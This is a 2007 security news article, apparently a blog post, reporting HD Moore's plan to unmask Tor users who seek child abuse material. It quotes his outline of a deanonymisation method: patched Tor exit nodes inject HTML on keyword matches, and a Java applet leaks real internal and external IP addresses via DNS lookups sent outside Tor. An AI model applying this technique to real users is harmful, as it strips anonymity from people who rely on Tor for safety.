March 6th, 2007
Hacker builds tracking system to nab Tor pedophiles
Amidst concerns that pedophiles are using public Tor (the Onion Router) servers to trade in child pornography, über-hacker HD Moore is building a tracking system capable of pinpointing specific workstations that searched for and downloaded sexual images and videos of kids.
Moore, the brains behind the Metasploit Project, has come up with a series of countermeasures that include using patched Tor servers and a decloaking engine to detect the exact location of a pedophile within an organization or residence.
Moore first discussed his "countermeasures" at a meeting of the Austin Hackers Association (AHA) last summer when it became clear that the EFF-backed anonymity/privacy network was being used for the most nefarious purposes. Further confirmation came last September when German authorities cracked down on Tor node operators because of the proliferation of child porn.
In an e-mail interview, Moore said the plan is to release the source code, which will allow anyone to run a patched Tor server to help pinpoint pedophiles online.
Moore's description of the countermeasures:
1. Run a patched TOR server. The patches embed a Ruby interpreter into the TOR connection engine and allow arbitrary Ruby scripts to process data before sending it back to the client.
2. When child porn-related keywords are seen (either the Web request, or the response), inject a little extra HTML code into the response going back to the Web browser. This HTML code would connect to my decloaking engine.
3. The decloak engine is based on the following techniques:
a) A unique identifier is created to track this user.
b) The browser is asked to resolve a unique host name, containing the identifier, that is part of a special domain hosted on my server. I run a modified DNS server that updates a database with the address from which the DNS request is received. The goal of this step is to determine the ISP of the user.
c) The browser is asked to load a Java applet. This applet uses two different techniques to obtain information about the user.
d) The first method uses the Java API to determine the local IP address of the user. This value is then passed back to the JavaScript code in the Web HTML snippet hosting the applet. The goal of this step is to get the real *internal* IP address of the user.
e) The second method involves the applet sending a raw DNS packet, directly to my server. Since this is UDP, it does not pass through TOR, and since it is sent by the Java code, it does not go through the ISP. This packet contains the unique identifier and if received, gives away the real *external* IP of the user. The goal of this step is to get the address of the user's NAT gateway.
f) At this point, my server is able to determine the internal address of the user, the external address from which they access the internet, and the ISP they use to provide DNS resolution, as well as the IP address they come from through the TOR network. This information, along with the unique tracking ID, allows me to identify a specific workstation within an organization or residence.
As to whether this is enough for law enforcement authorities to make an arrest and build a case, Moore's answer: "No idea."
Ryan Naraine is a journalist and security evangelist at Kaspersky Lab. He manages Threatpost.com, a security news portal. Here is Ryan's full profile and disclosure of his industry affiliations.
For daily updates on Ryan's activities, follow him on Twitter.
Subscribe to Zero Day via Email alerts or RSS.
